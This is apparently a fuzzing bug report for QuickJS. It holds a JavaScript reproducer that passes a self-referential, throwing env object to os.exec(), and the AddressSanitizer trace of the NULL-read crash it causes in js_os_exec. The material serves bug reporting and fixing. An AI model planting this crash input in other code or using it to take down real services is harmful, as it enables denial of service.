import * as os from "os";
// Reproducer for the ASan SEGV recorded below (js_os_exec, quickjs-libc.c:3315).
// The `env` object handed to os.exec() references itself, so its custom
// toString() calls JSON.stringify on a circular structure and throws a
// TypeError whenever the host tries to stringify an environment entry.
// NOTE(review): the trace shows a READ of address 0 inside js_os_exec; a
// plausible cause is that the throwing toString() leaves a NULL/exception
// value that the env-building path dereferences without checking — confirm
// against quickjs-libc.c before fixing.
const v0 = {};
v0.self = v0;
Object.assign(v0, {
  toString: function () {
    return JSON.stringify(this.self);
  },
});
try {
  os.exec(["echo", "test"], { env: v0, block: true });
} catch (v1) {
  // Deliberately empty: the ASan trace below shows the process dying inside
  // js_os_exec, so no JS exception ever reaches this handler.
}
=================================================================
==3218115==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557960c095b6 bp 0x7ffc77b27810 sp 0x7ffc77b27700 T0)
==3218115==The signal is caused by a READ memory access.
==3218115==Hint: address points to the zero page.
#0 0x557960c095b6 in js_os_exec /home/fuzz/quickjs/quickjs-libc.c:3315:16
#1 0x5579609fb150 in js_call_c_function /home/fuzz/quickjs/quickjs.c:17250:19
#2 0x557960a2f079 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17445:16
#3 0x557960a323e1 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17849:27
#4 0x557960abb4c1 in async_func_resume /home/fuzz/quickjs/quickjs.c:20391:15
#5 0x557960b043f3 in js_async_function_resume /home/fuzz/quickjs/quickjs.c:20670:16
#6 0x557960a686aa in js_async_function_call /home/fuzz/quickjs/quickjs.c:20764:5
#7 0x557960ac2dce in js_execute_sync_module /home/fuzz/quickjs/quickjs.c:30822:19
#8 0x557960ac21b9 in js_inner_module_evaluation /home/fuzz/quickjs/quickjs.c:30931:13
#9 0x557960a52c5d in js_evaluate_module /home/fuzz/quickjs/quickjs.c:30981:9
#10 0x557960a52c5d in JS_EvalFunctionInternal /home/fuzz/quickjs/quickjs.c:36588:19
#11 0x557960a526e3 in JS_EvalFunction /home/fuzz/quickjs/quickjs.c:36602:12
#12 0x5579609f8e65 in eval_buf /home/fuzz/quickjs/qjs.c:62:19
#13 0x5579609f8597 in eval_file /home/fuzz/quickjs/qjs.c:101:11
#14 0x5579609f8597 in main /home/fuzz/quickjs/qjs.c:519:17
#15 0x7fbc75f8ad8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#16 0x7fbc75f8ae3f in __libc_start_main csu/../csu/libc-start.c:392:3
#17 0x557960910714 in _start (/home/fuzz/quickjs/qjs+0x59714)
==3218115==Register values:
rax = 0x0000000000000000 rbx = 0x00007ffc77b27700 rcx = 0x00007bec753e9900 rdx = 0x00000000000001e5
rdi = 0x0000000000000000 rsi = 0x00007fbc75bbb0d8 rbp = 0x00007ffc77b27810 rsp = 0x00007ffc77b27700
r8 = 0x0000000000000018 r9 = 0x00007dfc753e0000 r10 = 0x00007fffffffff01 r11 = 0xaec7400a48dbea01
r12 = 0x00007bbc74225880 r13 = 0x0000000000000000 r14 = 0x00000f778e844b10 r15 = 0x00007bbc74225880
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/quickjs/quickjs-libc.c:3315:16 in js_os_exec
==3218115==ABORTING
POC:
Step:
Crash: